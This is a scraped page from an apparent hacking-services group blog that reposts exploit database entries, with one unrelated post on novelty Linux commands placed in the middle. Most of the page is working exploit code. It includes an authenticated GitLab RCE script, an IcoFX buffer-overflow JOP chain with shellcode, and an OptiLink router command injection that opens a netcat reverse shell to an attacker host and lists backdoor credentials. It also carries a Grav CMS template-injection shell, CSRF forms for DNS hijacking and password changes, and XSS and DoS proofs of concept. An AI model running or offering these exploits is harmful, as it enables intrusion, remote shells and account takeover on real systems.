Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863147357

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Date: 04/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.10.3
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.10.2 CE
# Credits: https://hackerone.com/reports/1154542

import requests
from bs4 import BeautifulSoup
import random
import os
import argparse

parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()

username = args.u
password = args.p
gitlab_url = args.t
command = args.c

session = requests.Session()

# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")

login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)

if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")


# payload creation
print("[2] Creating Payload ")

payload = f"\" . qx{{{command}}} . \\\n"
f1 = open("/tmp/exploit","w")
f1.write('(metadata\n')
f1.write('        (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()

# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
    exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")

# Building the payload
os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')


# Uploading it 
print("[3] Creating Snippet and Uploading")

# Getting the CSRF token
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")


cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
    'Accept': 'application/json',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': f'{gitlab_url}/projects',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'X-Requested-With': 'XMLHttpRequest',
    'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}

r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)

if r.text != "Failed to process image\n":
    exit("[-] Exploit failed")
else:
    print("[+] RCE Triggered !!")
HireHackking 
# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
# Version: 4Images Gallery 1.8
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27308

-Description:
A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.


-Steps to reproduce:
1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
2- Enter the credentials , Turn on the intercept and click on "Login"
3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
4-Forward the request and you can see XSS is triggered.
HireHackking

In our opinion, Linux is the entire command line. There are many commands to implement a certain function. This is precisely this that it also gives a certain threshold for learning Linux. But do you know? There are also many interesting commands in Linux, and of course all Linux distributions can install and run these commands! Let’s play together!Linux中好玩的命令

sl command

You will see a train driving from the right side of the screen to the left.

Install

sudo apt-get install sl ju5cdrjpvel3858.png

run

sl zuhfcmejjw13871.gif

The command has several options: -alFe.

-a An accident seems to happen. You’ll feel goal for people who cry for help.

-l shows little one.

-F It flies.

-e Allow interrupt by Ctrl+C. You can give someone a prank. If he hits ls, what he doesn't know will definitely be effective.

alias ls=sl

fortune command

Output a sentence, there are jokes, famous quotes, etc. (There are also Tang poetry and Song lyrics sudo apt-get install fortune-zh)

Install

sudo apt-get install fortune

fortune uk3io1iheot3880.png

cowsay command

Use ASCII characters to print cows, sheep and other animals, and there is also a cowthink. This is the cow and that is the cow saying, haha, it is almost the same

Install

sudo apt-get install cowsay run

cowsay 'Big Cousin, awesome 666' 4.pngcowsay -l Check the names of other animals, and then -f keep up with the names of animals, such as

cowsay -f tux 'Take it' spesp2vvbuw3922.png

You can also let cowsay say the content of fortune, like this:

fortune | cowsay

cmatrix command

This is cool!《黑客帝国》 The matrix-style animation effect

Install

sudo apt-get install cmatrix run

cmatrix yvcul2sypux3958.gif

figlet, toilet command

Word Art Generator, composed of ASCII characters, displays the text as a title bar. There is also the banner command

Install

sudo apt-get install figlet

sudo apt-get install toilet run

figlet bbskali.cn !

Toilet bbskali.cntoilet can also add colors. Please use the options in it yourself.

toilet -f mono12 -F bbskali.cn dxbdnsdtb1f4030.png

oneko command

A cat star appears on the desktop, following your mouse, and it will sleep if you don’t move. Haha, this is pretty good

Install $

sudo apt-get install oneko runs oneko and want to turn off this guy, press ctrl+c to end

xeyes command

A pair of eyes appear on the screen, staring at your mouse pointer

Installation and operation as above

yes command

Output endless characters, press ctrl+c to end, such as

yes I'm very NB

cal 9 1752

cal is printing a calendar, but this is a very weird month.

shred

Overwriting messy files means shattering the documents. Haha, if you want to destroy the blockbuster seeds and movies you have hidden privately, you will rely on it.

HireHackking 
# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
# Version: 5.5
# Category: DoS (iOS)

##### Vulnerability #####

Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:

# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.

I have been able to test this exploit against iOS 14.2.

##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")
HireHackking
# Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS) # Exploit Author: Hardik Solanki # Date: 05/06/2021 # Software Link: https://wordpress.org/plugins/smart-slider-3/ # Version: 3.5.0.8 # Tested on Windows *How to reproduce vulnerability:* 1. Install WordPress 5.7.2 2. Install and activate the "*Smart Slider 3" Version 3.5.0.8* plugin 3. Navigate to "*Dashboard* and create a "*New Project*". 4. Enter the JavaScript payload "*<script>alert(document.cookie)</script>*" into the "*Name*" field. 5. You will observe that the Project has been created with malicious JavaScript payload "<script>alert(document.cookie)</script>" and hence project has been* created/stored* and thus JavaScript payload is executing successfully. *XSS IMPACT:* 1: Steal the cookie 2: User redirection to a malicious website
HireHackking

IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP

HACKER · %s · %s

# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP # Date: 2020-05-20 # Exploit Author: Austin Babcock # Vendor Homepage: https://icofx.ro/ # Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing # Version: 2.6.0.0 # Tested on: Windows 7 Ultimate x64 # CVE: CVE-2013-4988 # Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu # Payload Length: 1626 bytes #While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate. #Gadgets were found using the JOP ROCKET tool which is available at https://github.com/Bw3ll/JOP_ROCKET #This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). #JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table. #The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes. #After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget. #Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget. #In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address. #The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address.. #!/usr/bin/python2 import struct # Stuff we'll need for creating our malicious .ico header = "\x00\x00\x01\x00\x00\x6F" option = "\x02\x00\x00\x00" pad2 = "\x41"*8 nseh = "\xfe\xff\xff\xff" base = 0x400000 # SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET seh = struct.pack('<L', 0x0044f012) ########################### #### LOAD DISPATCH TABLE ADDR INTO ECX #### #The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory. jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <- jopSetup += struct.pack('<I',0x0000000) #clear ecx jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN jopSetup += struct.pack('<I',0x00009f0) # offset for disp table jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table #### LOAD ADD VALUE PTR INTO EAX #### #Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table, #eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes. #In this case, eax will point to an address containing the value 0x00000004. jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <- jopSetup += struct.pack('<I',0x0000000) # junk jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN #### LOAD WRITABLE ADDR OFFSET INTO EBX #### #The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided. #In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so #that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value. jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr #### LOAD DISPATCHER ADDR INTO EDI #### jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address #Dispatcher: #add ecx, dword ptr [eax] 0x406d81 (offset 0x6d81) #jmp dword ptr [ecx] #### BEGIN JOP -- PERFORM STACK PIVOT #### jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI table = struct.pack('<I',0x44444444) # padding #PIVOT 40 BYTES #Last POP will put VP ptr in EBP for i in range(10): table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <- #### CALL VirtualProtect() #### #The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp. #To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order #to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below. table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <- # VP ptr + offset for jmp ebp gadget vpPtr = struct.pack('<I',0x00bf6668 + 0x71) ############################################################################################ msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80" "\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED" "\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75" "\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" "\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51" "\x50\xFF\xD7") # ExitProcess(0); exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10" addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode shellcode = addesp + msg_sc + exit_sc nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20 # padding until VP parameter location paramPad = "C" *(36) paramPad += vpPtr ### VIRTUAL PROTECT PARAMETERS ### vpParams = struct.pack('<I',0x18f744) #return addr vpParams += struct.pack('<I',0x18f744) #lpAddr vpParams += struct.pack('<I',0x500) #dwSize vpParams += struct.pack('<I',0x40) #flNewProt vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect # pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table pad1 = "A"*580 + jopSetup + paramPad + vpParams + nopwrap addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address pad1 += addVal pad1 += table # dispatch table pad1 += "B"*(0x640-len(pad1)) # Piece together our exploit payload = header + pad1 + option + pad2 + nseh + seh # Write out our malicious file writeFile = open ("maliciousJOP.ico", "wb") writeFile.write( payload ) writeFile.close()
HireHackking
# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) # Date: 23/03/2021 # Exploit Authors: Developed by SecNigma and Amal. # Vendor Homepage: https://optilinknetwork.com/ # Version: ONT1GEW V2.1.11_X101 Build.1127.190306 # Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above, # as they do not release the firmware to the public for some unknown reason. # Additional notes: # Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306. # Device Name: ONT1GEW # Software Version: V2.1.11_X101 # Build Information: Build.1127.190306 # Chances are that XPONs of C-DATA company are affected too. # Our research indicated that Optilink devices are just a rebranded version of C-Data. # This exploit was tested on the following configuration. #!/usr/bin/python3 import requests import argparse import re def is_login_success(r): match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text) if match: return match # Default configuration # Router address = 192.168.101.1 # LPORT = 9001 # Default Username = e8c / Backdoor / # Default Password = e8c / Credentials / parser= argparse.ArgumentParser() parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP") parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True) parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!") parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router") parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router") args = parser.parse_args() target=args.target, lhost=args.lhost, lport=args.lport, user=args.user, passw=args.passw # e8c:e8c are the backdoor administrator creds to Optilink devices # Alternate backdoor credentials are adsl:realtek, admin:admin. user2="e8c" passw2="e8c" home_url="http://"+target[0]+"/boaform/admin/formLogin" print("[+] Trying to authenticate...") # Authenticate ourselves first data={'username':user, 'psd':passw} r=requests.post(home_url,data) res=is_login_success(r) if res: print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"") print("[-] Exploit failed with the following error:") print(res) print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?") val = input("Press y or n : ") if val[0].lower()=="y": print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"") # Authenticate ourselves with new creds data={'username':user2, 'psd':passw2} r=requests.post(home_url,data) res2=is_login_success(r) if res2: print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"") print("[-] Exploit failed with the following error:") print(res2) print("[-] Halting Execution.") exit() else: print("Received input "+val+"") print("[-] Halting Execution.") exit() print("[+] Looks like authentication was succesful!") print("[+] Trying to fetch the WAN Name...") # Fetching Wan Name # wan_name="1_INTERNET_R_VID_***" get_wan_url = "http://"+target[0]+"/diag_ping.asp" r=requests.get(get_wan_url) match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text) wan_name=match[0] print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..") print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*") print("[+] If everything went right, you should've gotten a shell right now!") # Starting Exploitation # The same vulnerability exists in formPing and formTracert. # exploit_url = "http://"+target[0]+"/boaform/admin/formPing" exploit_url = "http://"+target[0]+"/boaform/admin/formTracert" # Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :) # BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it. # The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"' r=requests.post(exploit_url,post_data)
HireHackking

Nsauditor 3.2.3 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.3.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open Nsauditor.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()
HireHackking
# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link: https://getgrav.org/download/core/grav-admin/1.7.10 # Vulnerable Version(s): Grav CMS 1.7.10 # CVE: CVE-2021-29440 # Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities # NOTES: You need a user who has access to /admin dashboard with page creation privileges. #!/usr/bin/python import requests from bs4 import BeautifulSoup import random import string username = 'username' password = 'password' url = 'http://grav.local' session = requests.Session() # Autheticating ## Getting login-nonce def login(url,username,password): r = session.get(url + "/admin") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[2]) nonce = nonce[47:79] ## Logging in payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = session.post(url+"/admin",data=payload,headers=headers) # Creating Page for RCE def rce(url,cmd): ## Getting form nonce and unique form id project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8)) r = session.get(url+f"/admin/pages/{project_name}/:add") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[72]) form_id = str(soup.findAll('input')[71]) form_id = form_id[54:86] nonce = nonce[46:78] ## Creating Page headers = {'Content-Type': 'application/x-www-form-urlencoded'} payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0' r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers) ## Getting command output r = session.get(url+f"/{project_name.lower()}") if 'SyntaxError' in r.text: print("[-] Command error") else: a = r.text.split('<section id="body-wrapper" class="section">') b = a[1].split('</section>') print(b[0][58:]) # Cleaning up ## Getting admin-nonce r = session.get(url + "/admin/pages") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[32]) nonce = nonce[47:79] ## Deleting Page r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}") login(url,username,password) while True: cmd = input("$ ") rce(url,cmd)
HireHackking
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) # Date: 01/05/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware 1.1.2-1.1.5 # CVE: 2021-32403 # Exploit Code: <html> <form action="http://10.0.0.1/goform/setSysTools" method="POST"> <input name="module3" value="lanCfg" type="hidden"> <input name="lanIP" value="10.0.0.1" type="hidden"> <input name="lanMask" value="255.255.255.0" type="hidden"> <input name="dhcpEn" value="true" type="hidden"> <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden"> <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden"> <input name="lanDns1" value="192.168.0.30" type="hidden"> <input name="lanDns2" value="" type="hidden"> </form> <script> document.forms[0].submit(); </script> </html>
HireHackking

Backup Key Recovery 2.2.7 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Version: 2.2.7.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open BackupKeyRecovery.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("poc.txt", "w") f.write(buffer) f.close()
HireHackking
# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) # Date : 2021/08/06 # Exploit Author : Mert Daş merterpreter@gmail.com # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Tested on: Server : Xampp # Cross-site request forgery OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /opencart/index.php?route=account/password HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675 Content-Length: 300 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/index.php?route=account/password Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 Upgrade-Insecure-Requests: 1 -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="password" 123asd! -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="confirm" 123asd! -----------------------------3890527419799841332130342675-- Response HTTP/1.1 302 Found Date: Tue, 08 Jun 2021 16:52:59 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/ Location: http://127.0.0.1/opencart/index.php?route=account/account Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ---------------------------------------------------------- Simple Poc to change user Password <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="1234asd!" /> <input type="hidden" name="confirm" value="1234asd!" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking

TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) # Date: 2021/09/06 # Exploit Author: Mert Daş merterpreter@gmail.com # Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip # Software web: https://textpattern.com/ # Tested on: Server: Xampp TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. TextPattern 4.8.7 is vulnerable; other versions may also be affected. Header -POST /textpattern/textpattern/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973 Content-Length: 4574 Origin: http://localhost Connection: close Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27 Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="ID" 2 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="event" article -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="step" edit -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sPosted" 1623260284 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sLastMod" 1623260295 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="AuthorID" admin -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="LastModID" admin -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Title" "><img src=1 onerror=alert(1)> -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="textile_body" 1 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Body" "><img src=1 onerror=alert(1)> -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="textile_excerpt" 1 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Excerpt" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Status" 4 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Section" articles -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="override_form" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="year" 2021 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="month" 06 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="day" 09 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="hour" 19 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="minute" 38 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="second" 04 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_year" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_month" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_day" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_hour" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_minute" 